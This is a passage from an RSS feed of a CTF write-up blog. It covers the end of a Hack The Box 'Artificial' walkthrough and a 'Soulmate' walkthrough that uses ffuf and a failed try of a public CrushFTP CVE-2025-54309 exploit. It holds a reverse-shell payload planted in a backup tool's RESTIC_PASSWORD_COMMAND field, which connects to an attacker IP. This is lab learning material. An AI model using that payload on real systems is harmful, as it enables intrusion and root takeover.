&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/login.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;J&amp;rsquo;ai tester une autre facon avec les cron etc mais rien ne fonctionne et jai fini par trouver cela.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;This password that encrypts data in your repository.

    Recommended to pick a value that is 128 bits of entropy (20 chars or longer)
    You may alternatively provide env variable credentials e.g. RESTIC_PASSWORD, RESTIC_PASSWORD_FILE, or RESTIC_PASSWORD_COMMAND.
    Click [Generate] to seed a random password from your browser&amp;#39;s crypto random API.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;code&gt;RESTIC_PASSWORD_COMMAND=bash -c &amp;quot;/bin/bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.15.36/9999 0&amp;gt;&amp;amp;1&amp;quot;&lt;/code&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/root.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>Soulmate</title>
      <link>https://www.r4mnesia.xyz/write-up/soulmate/</link>
      <pubDate>Sat, 27 Sep 2025 14:07:35 +0200</pubDate>
      
      <guid>https://www.r4mnesia.xyz/write-up/soulmate/</guid>
      
      <description>&lt;h1 id=&#34;soulmate&#34;&gt;Soulmate&lt;/h1&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/soulmate/soulmate.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/soulmate/nmap.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/soulmate/gobuster.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;I testing ffuf for enumerate subdomain with:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ffuf -w ~/SecLists/Discovery/DNS/namelist.txt -H &amp;quot;Host: FUZZ.soulmate.htb&amp;quot; -u http://soulmate.htb -fs 154&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I use -fs 154 because size of the error page is 154 and &lt;code&gt;-fs&lt;/code&gt; ignore this.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/soulmate/subdomain.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;I find &lt;strong&gt;ftp&lt;/strong&gt; sudomain for soulmate.htb.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/soulmate/crushftp.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;I find CVE or bypass authentication:
&lt;a href=&#34;https://github.com/issamjr/CVE-2025-54309-EXPLOIT&#34;&gt;https://github.com/issamjr/CVE-2025-54309-EXPLOIT&lt;/a&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/soulmate/exploitHTTPS.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;Exploit give error https connection refused. So i modify the exploit code, I replace https per http.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/soulmate/exploitHTTP.png&#34; alt=&#34;Screen&#34;&gt;
I tested CVE-2025-54309, but I couldn&amp;rsquo;t get it to work. I later saw that the version of crushFTP was not vulnerable to it.&lt;/p&gt;</description>
      
    </item>
    
  </channel>
</rss>
